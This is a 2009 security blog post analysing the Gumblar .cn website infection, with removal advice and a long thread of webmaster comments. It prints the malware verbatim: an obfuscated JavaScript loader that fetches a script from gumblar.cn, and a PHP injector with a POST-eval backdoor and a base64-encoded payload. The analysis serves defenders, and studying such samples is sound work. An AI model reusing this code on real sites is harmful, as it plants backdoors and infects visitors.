msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Gumblar .cn Exploit – 12 Facts About This Injected Script

   07 May 09   Filed in Website exploits

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2 Every infected site has it’s own modification of the script. However every modification has common parts and can be easily identified as the gumblar .cn script.

  1. The script starts with “(function(
  2. The function has no name.  It is anonymous and self-invoking.
  3. The script is obfuscated. I.e. some characters are replaced with  their numeric codes, and then the “%” character replaced with some orbitrary character. Here are some sample excerpts of the encrypted data: “…20a.3d.22Sc.72iptEngin.65…“, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…“, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…
  4. Near the end of the script there is a “.replace(” function
  5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /”/g or /~/g, etc. that will decrypt the mangled “%” character.

3 When the script is executed (every time someone visits the infected web page),  another script from “gumblar . cn/rss/” is silently loaded and executed.

4 This code is usually injected right before the <body> tag.  I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5 Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique. And probably the same clean up steps may be applied.

6 Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page.

7 This script is also injected into .js (JavaScript) files. Usually at the very bottom.

8 Maybe it’s just a coincidence but about 95% of the infected sites used PHP. It is not possible to say for sure if the rest sites used PHP. Who knows.

9 This exploit doesn’t use some particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, on proprietary PHP sites.

10 Some people reported that the following code is injected into PHP files:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64 _decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

The base64-encoded part is this gumblar .cn script.

This PHP code, it’s structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected javascript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.

11 This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12 Gumblar .cn domain is currently blacklisted by Google.

Removal

Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it, is replace them with clean files from a backup.

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…

Round Up of the Comments

The comments section of this blog post contains a lot of additional useful facts from webmasters of infected sites.  Be sure to read them.

Zork noticed that his site’s .htaccess file was modified

Jason talks about what this exploit does from a visitors point of view. Of course a visitor can be a webmaster of another site.

adel sarlak mentioned that this exploit also adds image.php files into image directories. It can also change directory permissions.

James also elaborates on the scripts in image.php and some other .php
files. He suggest a shell command to find infected files.

C Filorux shared information about a POST-and-eval backdoor script found on an infected site.

rad-one posted a PHP script that scans all files from your site looking for the exploit signatures.
It looks incomplete and you might need to finish it before using.

Another removal instructions from Neil Williams.

Great comment from web host LarryL who deliberately infected a PC to find out how this virus works. With this information, he suggests re-infection preventing strategy.

Thanks for sharing this info. If anyone wants to publish an article about how they fought the infection or the impact of the infection, please contact me – I can publish it here as a guest post. I’m also looking for “hardening a website” tips and tricks.

P.S. I suggest that you use Unmask Parasites to check if you site is infected. It’s safe and fast.

Similar posts:

Reader's Comments (194)

  1. |

    [...] Gumblar .cn Exploit – 12 Facts About This Injected Script You are only as secure as the passwords you use and the web server your Forum is on. If the server has been compromised/hacked, then there’s nothing vBulletin can do to prevent potential security violations. (Related thread on vBulletin.com) If you are not at ease with making the above mentioned changes, or fear that you’ll end up messing your vBulletin Forum; feel free to open a thread in our Forum Management section or simply add a comment here; asking for assistance. [...]

  2. |

    [...] 網路上這篇討論描述了這個狀況,節錄如下: [...]

  3. |

    Hola, no serbiria hacer un php que busque esa linea de codigo y la borre? osea abrir archivo, editar la linea de la funcion y la del iframe, cerrar el archivo.

    Saludos

  4. |

    Full virus removal (edit by Denis: In arabic)
    http://www.alter-med.com/gum.htm

  5. |

    [...] finally managed to get rid of gumblar.cn infection and persuade google to list my site as clean again.  I am also planning to redesign this site a [...]

  6. |

    Our business is affected for more than one month now and tonight we have found your web site. We will try all you teach us.

    But we have found this Trojan put his “feet” in the restore application of windows. (Sorry for my poor english)It is this function who let you come back in the past to restore your computer.

    We have found the restore is corrupted.

    We have also deleted all our FTP softwares, dreamweaver too.

    But Registry Mechanic always show us CuteFTP is not “complete” and ask us the permission to repair it. Always we click “no”. But we have uninstall this software and manually destroy all resident files. So we think this Trojan put something in registry too.

    We have erase all history because web sites are saved on hard disk in that history. Now we don’t let web sites be kept on hard drive when we close the computer.

    Hoping these infos will help everybody too.

  7. |

    My sites are suffering from Gumblar virus too.

    If the hackers has our FTP login/password information, why doesn’t it do more damage to the sites? Not that I want it to, but I just don’t understand the logic once they hacks into WordPress or other opensource scripts.

    About 20-25%+++ of sites are running some sort of Opensource scripts.

    • |

      Hackers are not interested in damaging legitimate web sites. They just use them to effectively distribute malware, which is a multi-million dollar business.

      You might want to read this article: The economics of Botnets

  8. |

    [...] the little blackhat with the Gumblar and the KoobFace Yeah buddy, they’re his own bots That little blackhat got his own jet [...]

  9. |

    I marked one more thing.

    All the malicious files uploaded to my site where the directory permission was 777.
    None of other directory had any malicious file !

    That means their target is directory with 777 permission.

    But I don’t know how they could upload the files in without FTP access ?

    or if they had the FTP access then why it was uploaded where directory permission was 777 ?

    • |

      That must be coincidence. Gumblar injects scripts into any files regardless of permissions.

      Anyway, I haven’t heard of new Gumblar attacks for more than 3 months now.

  10. |

    [...] … </SCRIPT> con el código malicioso de todos tus archivos .htm, .php, .asp, etc. Aquí hay indicaciones de como identificarlo en concreto (en inglés), aunque cualquier Webmaster con [...]

  11. |

    A variant of Gumblar is activated again.
    Two of our domains have just been infected:
    Included in the body section of all .htm is:

    Also a image.php file is included in our image library.
    js-files have been altered

  12. |

    This is what I hate about the internet, when someone is wreaking such havoc with so many people and there is a clear path to the source which obvious to everyone surely somebody can take action and shutdown this gumblar.cn site and track the owners down, where are the authorities? why is this site and domain still active and why are the owners still able to operate. its plain crazy many, if authorities wont act then why isnt somebody putting a hit or jihad out on them!!

    • |

      I agree completely, this is terrorism and it affects so many people both personal and business sites not to mention visitors of those infected sites. It must be costing webmasters huhndreds of thousands if not millions of dollars and hours so yeah I think the originators do need to be tracked down and caught. I would chip in some money to see them hunted like the dogs they are!!

  13. |

    [...] information can be found here: Gumblar.cn Exploit, 12 facts about this injected script A few more facts about the gumblar attack from sophoslab and scansafe Martuz.cn is a new [...]

  14. |

    Our site was infected 14 days ago. So we cleaned the server, installed all new with all security updates, newest php and sql version, even new joomla!.
    Now, our webserver has been infected the second time… There are a lot of tutorials how to desinfect the webserver (or just clean up by deleting everything), but what is with the Computer? How can we clean possible infectet computers too? We use a SonicW… Firewall with content filter, and TrendM… antivirus with antispy – both don’t find the virus on PC. Even a special Anti-Maleware-Software will detect Gumblar. so.. how to protect and how to clean?

  15. |

    As a FYI, a friend sites got hit with this with continuous re-infections. I wrote a windows service that monitored his server and while not stopping the infection it does immediately fix the infections. I have a few more days of testing but will post it at

    http://reddwarfdogs.com/websitehack/ around oct 27th..

  16. |

    Make sure to check the folders “error_docs” and “httpsdocs” on your webserver!!!

    The malicious code can also be found in these locations – therefore the infection will not be cured if you just upload a clean backup version of your website from a clean system unless you sanitize those locations too.

  17. |

    Our site was infected 14 days ago. So we cleaned the server, installed all new with all security updates, newest php and sql version, even new joomla!.
    Now, our webserver has been infected the second time… There are a lot of tutorials how to desinfect the webserver (or just clean up by deleting everything), but what is with the Computer? How can we clean possible infectet computers too? We use a SonicW… Firewall with content filter, and TrendM…

  18. |

    [...] The virus that owned the old site (along with every other index.* on my webspace) was a variant of the Gumblar.cn virus http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  19. |

    I have several sites; you rightly pont to the password security. I have like this ……

    inserted before <body tag in all my html pages. I replace them with clean files from my hard disk; but next day the files are again corrupt with new <script with a new url

  20. |

    Make sure to check the folders “error_docs” and “httpsdocs” on your webserver!!!

    The malicious code can also be found in these locations – therefore the infection will not be cured if you just upload a clean backup version of your website from a clean system unless you sanitize those locations too.

  21. |

    If you know the date of the infection, you can easily check all files that were edited on that day.

    btw, I noticed, it replaced a file called home.inc, so it probably also targets all files containing “home” in the name, additionally to “index”, “default”, etc and ALL .js files.

  22. |

    [...] its name is Gumblar. You can find further information about Gumblar on Unmask Parasites Blog, Wikipedia, or ISS.net. I got alot of useful information. However, I might be infected by its [...]

  23. |

    [...] malware researchers reported widespread compromises pointing to the domains gumblar.cn and martuz.cn, both of which made it on [...]

  24. |

    [...] with viruses like Gumblar stealing FTP passwords and farming them out to hackers so they can upload malicious code into user files. What you end up with is a flood of complaints from users about errors on their [...]

  25. |

    Hi i have made this script to remove all scripts on server using PERL. See the script @ Remove Gumblar Virus

    • |

      Hi,

      1. The linked article is not about Gumblar. It describes a different infection (this one)

      2. Use the script at you own risk. The scripts used by this infection mutate every day and that removal script may not detect the new modifications (at best) or even corrupt your data (in worst case).

      3. You don’t need any removal scripts at all if you have a clean backup. Just remove everything and then restore the site from that backup.

  26. |

    [...] details For more details about Gumblar, see this Wikipedia article or this Unmask Parasites article. For a technical summary of Gumblar, there’s a nice article on iss.net about it. [...]

  27. |

    Hey, hopefully someone can make use of this 

    If you are having issues running virus scanners whilst your computer is turned on, try to start into ‘Safe Mode’.

    If you’re using a version of Windows, you’ll be able to do this. (Windows XP, Windows Vista & Windows 7)

    Safe Mode:
    Turn computer off
    Turn computer on whilst tapping F8. When prompted select ‘safe mode with networking’
    When prompted, click Yes & start into Windows as normal.

  28. |

    Just to add some info.

    Our clients sites, got inject, more than 200 sites, we have recovered all the sites, and seems to only have affect the index files, or at least the files that have common names.

    We are still checking the wp sites but these seem more affected.

    Still haven´t found the computer that originated the FTP “hole”, as many of the sites are not on more recent ftp softwares. But lesson learn don´t store passwords on the softwares.